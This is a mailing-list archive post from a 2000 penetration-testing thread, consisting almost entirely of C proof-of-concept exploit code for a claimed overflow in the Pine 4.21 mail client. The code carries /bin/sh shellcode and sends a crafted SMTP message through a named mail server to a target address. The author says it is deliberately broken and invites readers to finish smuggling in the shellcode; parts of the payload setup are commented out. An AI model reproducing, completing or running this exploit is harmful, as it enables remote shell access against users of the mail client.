Penetration Testing mailing list archives
Re: [PEN-TEST] First step of a pen-test
From: Riley Hassell <riley () SPEAKEASY NET>
Date: Fri, 22 Sep 2000 17:36:47 -0700
/*############## ##### ###### ## # ## # # # # # # # # # PINE Exploit 4.21 [ bTm ] # # # Proof of Concept: Pine 4.21 There exists a vulnerability in Pine 4.21 involving the portion of code in charge of peroidically checking email when a pine client is open. Run pine in one window, then send an email to the account owning that session. Switch back over and hit [Control+L] (to check your mail). Woohoo! now open the core up in gdb: #2 0x40084098 in abort () at ../sysdeps/generic/abort.c:139 #3 0x817470c in strcpy () at ../sysdeps/generic/strcpy.c:43 #4 0x8137f82 in strcpy () at ../sysdeps/generic/strcpy.c:43 #5 0x8158760 in strcpy () at ../sysdeps/generic/strcpy.c:43 #6 0x40082c28 in __restore () at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127 #7 0xe7e2bfff in ?? () Cannot access memory at address 0xe7e2bfff. Oops, my alignment could use some work. Hello's : Mega,Loki,Lamagra,and zen-parse. BTW: this is broken, you have to figure it out on your own how to smuggle the shellcode in. Any real Pentester can get this working fairly quickly. Just be polite, don't forget to say HELO! Arkane [bTm] ######### ### # ## # # ## # # ## # # # # # # # ### ## ## */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <string.h> #include <unistd.h> unsigned long get_sp (void) { __asm__ ("mov %esp, %eax"); } #define ADDRLEN 700 #define EXECLEN 1000 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main (int argc, char **argv) { struct sockaddr_in server; struct hostent *hp; int s; char helo[100]; char mail[100]; char rcpt[100]; char data[2500]; char start[20]; int offset = 0; unsigned long addr; int i; char *addrs,*exec; addrs = (char *) malloc (ADDRLEN); exec = (char *) malloc (EXECLEN); if(argc < 2) { printf(" Usage: %s <Email Address> <offset>\n", argv[0]); printf(" \n\n"); exit(0); } if (argc == 3) offset = atoi (argv[2]); //addr = get_sp () - offset; addr = 0xbfffe7e2; //RH62 memset(addrs,0x41,ADDRLEN); // for (i = 0; i < ADDRLEN ; i += 4) // *(unsigned *) &addrs[i] = addr; // memset(exec,0x90,EXECLEN); // memset(addrs+195,0x90,5); // memcpy (addrs + 200, shellcode, strlen (shellcode)); if((hp = gethostbyname ("mail.speakeasy.org")) == NULL) { printf ("Could not resolve mail.speakeasy.org.\n"); exit(1); } if((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error"); exit(1); } server.sin_family = AF_INET; server.sin_port = htons (25); server.sin_addr.s_addr = *(u_long *) hp->h_addr; bzero (&(server.sin_zero), 8); if(connect(s, (struct sockaddr *) &server, sizeof (struct sockaddr)) == -1) { printf ("Connection refused\n"); exit(1); } sprintf (helo, "helo test\r\n"); sprintf (mail, "mail from: %s\r\n",argv[1]); send (s, helo, strlen (helo), 0); send (s, mail, strlen (mail), 0); sprintf (rcpt, "rcpt to: %s\r\n",argv[1]); send (s, rcpt, strlen (rcpt), 0); sprintf(start,"data\r\n"); send (s, start, strlen (start), 0); fprintf(stderr," Message Sent! \n"); sprintf(data,"From: %s AAAAAAAA test () test net\r\n%s\r\n.\r\nquit\r\n",addrs,exec); send (s, data, strlen (data), 0); close (s); exit(0); } ;) Riley Hassell riley () speakeasy org
Current thread:
- Re: [PEN-TEST] First step of a pen-test, (continued)
- Re: [PEN-TEST] First step of a pen-test Tonick, Mike (Sep 19)
- Re: [PEN-TEST] First step of a pen-test Jason Stout (Sep 20)
- Re: [PEN-TEST] First step of a pen-test Teicher, Mark (Sep 20)
- [PEN-TEST] anyone using firewalking? The Picard (Sep 20)
- Re: [PEN-TEST] anyone using firewalking? Jonathan Rickman (Sep 21)
- Re: [PEN-TEST] anyone using firewalking? El Nahual (Sep 21)
- Re: [PEN-TEST] First step of a pen-test Teicher, Mark (Sep 20)
- Re: [PEN-TEST] First step of a pen-test H Carvey (Sep 20)
- Re: [PEN-TEST] First step of a pen-test Loschiavo, Dave (Sep 20)
- Re: [PEN-TEST] First step of a pen-test Max Vision (Sep 20)
- Re: [PEN-TEST] First step of a pen-test Dawes, Rogan (Sep 21)
- Re: [PEN-TEST] First step of a pen-test Riley Hassell (Sep 23)
- Re: [PEN-TEST] First step of a pen-test Erik Tayler (Sep 23)
- Re: [PEN-TEST] First step of a pen-test Riley Hassell (Sep 23)
- Re: [PEN-TEST] First step of a pen-test Tonick, Mike (Sep 22)
- Re: [PEN-TEST] First step of a pen-test Robert van der Meulen (Sep 22)
- Re: [PEN-TEST] First step of a pen-test Wolfgang Zenker (Sep 22)
- Re: [PEN-TEST] First step of a pen-test Missy, E (Sep 22)
- Re: [PEN-TEST] First step of a pen-test Cassiano Aquino (Sep 22)
- Re: [PEN-TEST] First step of a pen-test Robert van der Meulen (Sep 22)